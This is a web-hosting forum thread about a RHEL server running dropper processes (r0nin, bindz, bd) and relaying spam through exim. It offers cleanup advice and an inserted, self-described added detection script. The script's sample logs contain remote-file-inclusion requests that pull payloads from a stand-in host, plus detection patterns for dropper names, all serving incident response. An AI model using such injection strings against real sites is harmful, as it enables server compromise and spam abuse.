server compromised?
Hi, I have the following showing up in my ps:
- r0nin
- bindz
- bd
Hmm, I'm running RHEL and it seems someone is using my server to send spam mails. I have a lot of load going to exim on my server; most of it seems to be targeting Brazil... Any help or advice is greatly appreciated, ASAP. Thank you.
Here is part of the exim process list:

root  23186  0.1 0.3 9028 3296 ? S 13:29 0:00 /usr/sbin/exim -Mc 1ESh2s-00061w-HR
mail  23190  0.0 0.3 9028 3344 ? S 13:29 0:00  \_ /usr/sbin/exim -Mc 1ESh2s-00061w-HR
root  24288  0.1 0.3 9032 3296 ? S 13:31 0:00 /usr/sbin/exim -Mc 1ESh4H-0006Jh-OQ
mail  24290  0.0 0.3 9032 3332 ? S 13:31 0:00  \_ /usr/sbin/exim -Mc 1ESh4H-0006Jh-OQ
root  24359  0.5 0.3 9032 3292 ? S 13:31 0:00 /usr/sbin/exim -Mc 1ESh4N-0006Kn-4J
mail  24364  0.0 0.3 9044 3384 ? S 13:31 0:00  \_ /usr/sbin/exim -Mc 1ESh4N-0006Kn-4J
root  24676  0.6 0.3 8904 3264 ? S 13:31 0:00 /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.terra.com.br 200.154.55.2 2 1ESh4l-0006Po-FN
mail  24677  0.6 0.3 9032 3312 ? S 13:31 0:00  \_ /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.terra.com.br 200.154.55.2 2 1ESh4l-0006Po-FN
root  24760  0.5 0.3 8904 3264 ? S 13:31 0:00 /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.tle.terra.com.br 200.154.55.2 3 1ESh18-0005fH-DO
mail  24764  0.1 0.3 9032 3308 ? S 13:31 0:00  \_ /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.tle.terra.com.br 200.154.55.2 3 1ESh18-0005fH-D
root  24864  2.1 0.3 8908 3264 ? S 13:32 0:00 /usr/sbin/exim -MCS -MCP -MC remote_smtp mx1.mail.yahoo.com 67.28.113.10 2 1ESIJC-0005hX-4k
mail  24867  0.1 0.3 9036 3320 ? S 13:32 0:00  \_ /usr/sbin/exim -MCS -MCP -MC remote_smtp mx1.mail.yahoo.com 67.28.113.10 2 1ESIJC-0005hX-4k
root  24925  1.6 0.3 8900 3264 ? S 13:32 0:00 /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.terra.com.br 200.154.55.2 6 1ESh4U-0006M4-0Y
mail  24929  0.0 0.3 9028 3312 ? S 13:32 0:00  \_ /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.terra.com.br 200.154.55.2 6 1ESh4U-0006M4-0Y
root  24932  2.1 0.3 9024 3292 ? S 13:32 0:00 /usr/sbin/exim -Mc 1ESh54-0006U2-TZ
mail  24962  1.6 0.3 9024 3336 ? S 13:32 0:00  \_ /usr/sbin/exim -Mc 1ESh54-0006U2-TZ
mail  25020 14.0 0.3 9032 3348 ? S 13:32 0:00 /usr/sbin/exim -Mc 1ESh5B-0006VW-Qi
mail  25037  0.0 0.1 6584 1852 ? R 13:32 0:00  \_ /usr/sbin/exim -t -oem -oi -f <> -E1ESh5B-0006VW-Qi
root  25032  0.0 0.3 9028 3296 ? S 13:32 0:00 /usr/sbin/exim -Mc 1ESh5C-0006Vi-SB
mail  25036  0.0 0.3 9028 3336 ? R 13:32 0:00  \_ /usr/sbin/exim -Mc 1ESh5C-0006Vi-SB
Wipe the server. Hire an admin. This round is over.
Looks like a typical vulnerable web script compromise. Are all those processes running as the apache user?
If this is a shared/cPanel box, grep for these binary names in /usr/local/apache/domlogs and try to locate the virtual host they came in by, which should lead you to the bug (most likely a PHP-based forum or CMS). This script will help you detect these types of attacks next time: http://www.thunkers.net/~navs/public/nobody-knows.sh
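The two checks this reply describes, as an added example written for this edit (it is not code from the thread and not the nobody-knows.sh script linked above): first, scan `ps aux` output and flag only processes owned by the web-server user whose command matches the dropper names from the first post, so that exim's own root/mail children are not confused with the intrusion; second, grep every per-vhost Apache log under a cPanel-style /usr/local/apache/domlogs/<vhost> layout for the same names and print which vhost and client IP the request came in on. Assumed, and not from the thread: the combined log format, the web-user list (nobody/apache/www-data), and the sample ps and log lines, which are constructed to look like a PHP remote-file-inclusion pull of the droppers.

```shell
#!/bin/sh
# Added example, not from the thread. Hunts for the dropper names the original
# poster saw in ps, (1) in `ps aux` output and (2) in per-vhost Apache logs.
# Assumptions: cPanel-style /usr/local/apache/domlogs/<vhost> layout, Apache
# combined log format, and the name list taken from the first post.

PATTERNS='r0nin|bindz|/bd([^A-Za-z0-9_]|$)'
WEB_USERS='nobody|apache|www-data'

# flag_web_user_procs : read `ps aux` text on stdin; print "PID user command"
# for web-user processes whose command matches PATTERNS. Exim running as
# root/mail, as in the listing above, is normal delivery and is not flagged.
flag_web_user_procs() {
    awk -v users="^(${WEB_USERS})\$" -v pat="$PATTERNS" \
        '$1 ~ users && $11 ~ pat { print $2, $1, $11 }'
}

# find_dropper_hits DIR : grep each log file in DIR for PATTERNS and print
# "vhost client-ip request-line" for every hit (file name = vhost on cPanel).
find_dropper_hits() {
    grep -E -H "$PATTERNS" "$1"/* 2>/dev/null | while IFS= read -r line; do
        file=${line%%:*}        # grep prefixes "path:"; paths carry no colon
        rest=${line#*:}
        req=${rest#*\"}         # text after the first quote is the request
        printf '%s %s %s\n' "${file##*/}" "${rest%% *}" "${req%%\"*}"
    done
}

count_hits() { find_dropper_hits "$1" | wc -l | tr -d ' '; }
hit_vhosts() { find_dropper_hits "$1" | cut -d' ' -f1 | sort -u; }

# Constructed sample logs (not real data): an RFI pull of r0nin and bindz via a
# PHP "page=" parameter on one vhost, and a fetch of /bd on another.
make_sample_domlogs() {
    d=$(mktemp -d)
    cat > "$d/example.com" <<'EOF'
198.51.100.9 - - [12/Oct/2005:13:18:44 -0400] "GET /index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Oct/2005:13:20:01 -0400] "GET /forum/index.php?page=http://203.0.113.77/r0nin? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [12/Oct/2005:13:20:09 -0400] "GET /forum/index.php?page=http://203.0.113.77/bindz? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
EOF
    cat > "$d/shop.example.net" <<'EOF'
198.51.100.20 - - [12/Oct/2005:13:21:10 -0400] "GET /cart.php?id=7 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Oct/2005:13:25:33 -0400] "GET /tmp/bd HTTP/1.1" 404 210 "-" "Wget/1.9"
EOF
    printf '%s\n' "$d"
}

# Constructed `ps aux` sample: two droppers as nobody, plus normal exim children.
sample_ps() {
    cat <<'EOF'
USER       PID %CPU %MEM   VSZ  RSS TTY STAT START TIME COMMAND
nobody    4417  0.0  0.1  2108  900 ?   S    13:15 0:00 ./r0nin
nobody    4421  0.0  0.1  2112  904 ?   S    13:15 0:00 ./bindz 6666
mail     25020 14.0  0.3  9032 3348 ?   S    13:32 0:00 /usr/sbin/exim -Mc 1ESh5B-0006VW-Qi
root     24676  0.6  0.3  8904 3264 ?   S    13:31 0:00 /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.terra.com.br
EOF
}

# Usage: sh domlog-hunt.sh [/usr/local/apache/domlogs]
# With no argument the constructed samples are scanned instead of the live box.
main() {
    if [ -n "${1:-}" ]; then
        ps aux | flag_web_user_procs
        find_dropper_hits "$1"
    else
        sample_ps | flag_web_user_procs
        d=$(make_sample_domlogs)
        find_dropper_hits "$d"
        rm -rf "$d"
    fi
}
main "$@"
```

Run it against the real domlogs directory once, then feed the vhost it names into the forum or CMS on that account; the request line shows the exact script and parameter that fetched the dropper. Any hit from a web-user process or a domlog request should be preserved (copy the log, not just grep it) before the box is cleaned or rebuilt.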
Check out this guide here: http://www.eth0.us/hacked
eth00 has some very good guides about everything!
Run chkrootkit from http://www.chkrootkit.org/ and rkhunter from http://www.rootkit.nl/projects/rootkit_hunter.html
If it's not a root compromise, there should be no need for a reinstall.
How much would one charge to provide complete protection of my server from this point?
I would recommend you contact someone like www.totalservesolutions.com. I have used them and they are quite good!
Powered by vBulletin
Copyright ©2000 - 2013, Jelsoft Enterprises Ltd.
© WebHostingTalk, 1998 - 2011. All Rights Reserved.